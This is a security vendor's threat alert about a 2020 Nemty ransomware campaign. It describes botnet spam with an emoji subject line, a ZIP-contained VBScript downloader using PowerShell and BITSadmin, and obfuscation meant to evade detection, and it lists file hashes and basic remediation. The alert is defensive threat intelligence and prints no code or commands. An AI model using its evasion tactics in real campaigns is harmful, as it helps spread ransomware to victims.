• Services
    • Assess
      • Compromise Assessment
      • APT Assessment
      • Penetration Testing
      • Secure Architecture Design & Review
      • Red Team Assessment
      • Purple Team Assessment
      • Social Engineering
      • Source Code Review
    • Transform
      • SOC Consultancy
      •     SOC Maturity Assessment
      •     SOC Model Evaluation
      •     SOC Gap Analysis
      •     SIEM Gap Analysis
      •     SIEM Optimization
      •     SOC Content Pack
    • Train
      • Security Awareness and Training
      • Tabletop Exercise
      • Simulated Cyber Attack Exercises
    • Respond
      • Incident Response
      • Incident Analysis
  • Managed Security
    • Managed Security Monitoring
      • Remote SOC
      • Onsite SOC
      • Hybrid SOC
    • Managed Security Services
      • Managed Detection and Response
      • Managed Endpoint Detection and Response
      • Managed Threat Intelligence
      • Managed Threat Hunting
      • Managed Risk-Based SOAR
      • Managed Penetration Testing
  • Solutions
  • Resources
    • Blog
    • Threat Advisory
  • Company
    • About Us
    • Careers
    • Contact
Rewterz Informative Update : Ransomware Impacting Pipeline Operations
February 20, 2020
Rewterz Threat Advisory – ICS: B&R Industrial Automation Automation Studio and Automation Runtime
February 21, 2020

Rewterz Threat Alert – Nemty Ransomware- Asia Pacific Mailboxes Swarmed by Dual Downloaders

February 21, 2020

Severity

High

Analysis Summary

A new Nemty ransomware campaign showing changes in its distribution methods. The first wave of Nemty activity spread via RDP and quickly moved to using the Phorpiex botnet to spread via SMB hosts with weak credentials. In this new campaign, the Phorpiex botnet continues to be leveraged but this time to send spam emails. These emails have ZIP archives attached and a subject line that is simply a smiley emoji. The subject line is likely to evade keyword detection in spam filters. Inside the ZIP archive is a VBScript file used to download and execute the final payload. CMD is used in combination with both PowerShell and BITSadmin, likely to increase chance of infection if one of the methods is blocked by firewalls or AV. In some cases, garbage code was added to obfuscate the file and evade static detection. The Nemty ransomware is downloaded as an executable from a known Phorphiex server.

VBScript downloader infection chain

Impact

File Encryption

Indicators of Compromise

SHA-256

  • bc7e55048478507b6734c8314857f33309f663ff4f3c3cb65e653a5b308f0bd5
  • 0517ae27126f767937976d733064869a1b5296aaf622596af6cd4c4aa2184bd2
  • 069390b186ce9a3678441d208a5614340d4b2a0a7bbe2991e3087b72e7480112
  • 06cf3e872a886db4ed77639eebe08361f9a81d4908ee643de0135f491f690923
  • 06df03c989148bcbee007b66216a4fdcec635491922fd744a32315010ba99d2a
  • 07c2632f548015a0e61d14b8f5a9e4e988c1674fcc02a90a87d3d94afe0c8135
  • 080cb0ad0d69490097f641311186147e8b16954d23885630a7231f7ff5bd8bda
  • 0c0c467b094b13943ea7d2b5f91fb19e81c6b521a7a58c27e571ed33a56d8ccb
  • 0da9aa96f41ad1cc117dcff1272521a0b9be55e59635704af897169268ef2db7
  • 0f49c5375ac7aac76caf8cb0dfd16b8f422e197162c36a4a4ba1449cd08e5056
  • 12294dbc60c9b9935abdbba25da98b0314f82da9252e29229860ee4e346aa6ad
  • 1261860de3fd1ea3e59f61572f12c2efa41d460896a46ef8731787724f8845ca
  • 150b1e4155894701c4b8919413b73d4eebc1d781c4203f54a0713b552f6961be
  • 160402da510e6c751bef39ab6af152ef71d7a25c710a8d88586dc56b5bfe1170
  • 170d3ddddc64a9feca1fc5ef77b5c1fd0b86b8fb98a91256070ad7be7cf0e619
  • 18b656b27704b9fe418d55f5472bda0b2ffe5ae8eb26b910f4db4029fb8a9f7e
  • 25a29351100b75f30ae133a3e035b2852298bbe05b9fd08f73a4a8fda52c439d
  • 2f3bed3382382b95c84390b6138f68875ce96273fa5f521bab83d67b8e9ad740
  • 758c26dcf2a8963b3fcf3b6ea796aacf08870b9733ac87a608cd1be6b56af421
  • b20e0ade92a2e824f66e991db75f9ef8b9260e9acda55d52b0d9e1c0936919f8
  • e96ca035fc8a2c2ae2dc2e6c112942469821c6682beab8fa7ece1e25e55497ba

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the links/attachments sent by unknown senders.
  • Services
    • Assess
      • Compromise Assessment
      • APT Assessment
      • Penetration Testing
      • Secure Architecture Design & Review
      • Red Team Assessment
      • Purple Team Assessment
      • Social Engineering
      • Source Code Review
    • Respond
      • Incident Response
      • Incident Analysis
  • Transform
    • SOC Consultancy
    •     SOC Maturity Assessment
    •     SOC Model Evaluation
    •     SOC Gap Analysis
    •     SIEM Gap Analysis
    •     SIEM Optimization
    •     SOC Content Pack
  • Train
    • Security Awareness and Training
    • Tabletop Exercise
    • Simulated Cyber Attack Exercises
  • Managed Security
    • Managed Security Monitoring
      • Remote SOC
      • Onsite SOC
      • Hybrid SOC
    • Managed Security Services
      • Managed Detection and Response
      • Managed Endpoint Detection and Response
      • Managed Threat Intelligence
      • Managed Threat Hunting
      • Managed Risk-Based SOAR
      • Managed Penetration Testing
  • Solutions
  • Resources
    • Blog
    • Threat Advisory
  • Company
    • About Us
    • Careers
    • Contact
COPYRIGHT © REWTERZ. ALL RIGHTS RESERVED.